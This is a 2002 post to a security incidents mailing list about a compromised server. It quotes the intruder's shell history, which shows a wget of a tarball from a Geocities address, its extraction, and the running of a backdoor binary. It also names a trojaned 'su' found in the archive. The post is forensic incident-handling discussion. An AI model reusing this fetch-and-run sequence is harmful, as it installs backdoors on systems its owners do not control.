[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Rooted, .haos on system

To: incidents@xxxxxxxxxxxxxxxxx
Subject: Re: Rooted, .haos on system
From: Damian Gerow <damian@xxxxxxxxxx>
Date: 16 Dec 2002 13:47:28 -0500
Delivered-to: mailing list incidents@xxxxxxxxxxxxxxxxx
Delivered-to: moderator for incidents@xxxxxxxxxxxxxxxxx
Delivery-date: Mon, 16 Dec 2002 20:16:50 +0100
Envelope-to: incidents@xxxxxxxxxxxxxxxxxxxxxxxxxxxxx
In-reply-to: <1040060313.16409.16.camel@xxxxxxxxxxxxxx>
List-help: <mailto:incidents-help@securityfocus.com>
List-id: <incidents.list-id.securityfocus.com>
List-post: <mailto:incidents@securityfocus.com>
List-subscribe: <mailto:incidents-subscribe@securityfocus.com>
List-unsubscribe: <mailto:incidents-unsubscribe@securityfocus.com>
Mailing-list: contact incidents-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Organization: Sentex Data Communications
References: <20021212234529.29690.qmail@xxxxxxxxxxxxxxxxx> <1040060313.16409.16.camel@xxxxxxxxxxxxxx>

On Mon, 2002-12-16 at 12:38, Damian Gerow wrote:
> On Thu, 2002-12-12 at 18:50, Damian Gerow wrote:
> > I've just received word that one of our customers was rooted, and he's asking about the file ".haos".  Nothing rings any bells, has anyone heard of it?
> 
> Just a quick update to this...

And one last tidbit...

Left in the .bash_history was this:

        w
        cd /tmp
        wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
        ./epc

A quick check tells me that 'epc' is a backdoor utility, and the other
file contained within loc.tgz looks like a trojaned 'su'.

I've already notified Geocities abuse, and haven't heard back from them
yet.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Follow-Ups:
- Re: Rooted, .haos on system
  - From: Mike Katz
- Re: Rooted, .haos on system
  - From: zeno
- Re: Rooted, .haos on system
  - From: Carlos Eduardo Pedroza Santiviago

References:
- Rooted, .haos on system
  - From: Damian Gerow
- Re: Rooted, .haos on system
  - From: Damian Gerow

Prev by Date: Re: Logs: Many hits with source port of 80
Next by Date: RE: Logs: Many hits with source port of 80
Previous by thread: Re: Rooted, .haos on system
Next by thread: Re: Rooted, .haos on system
Index(es):
- Date
- Thread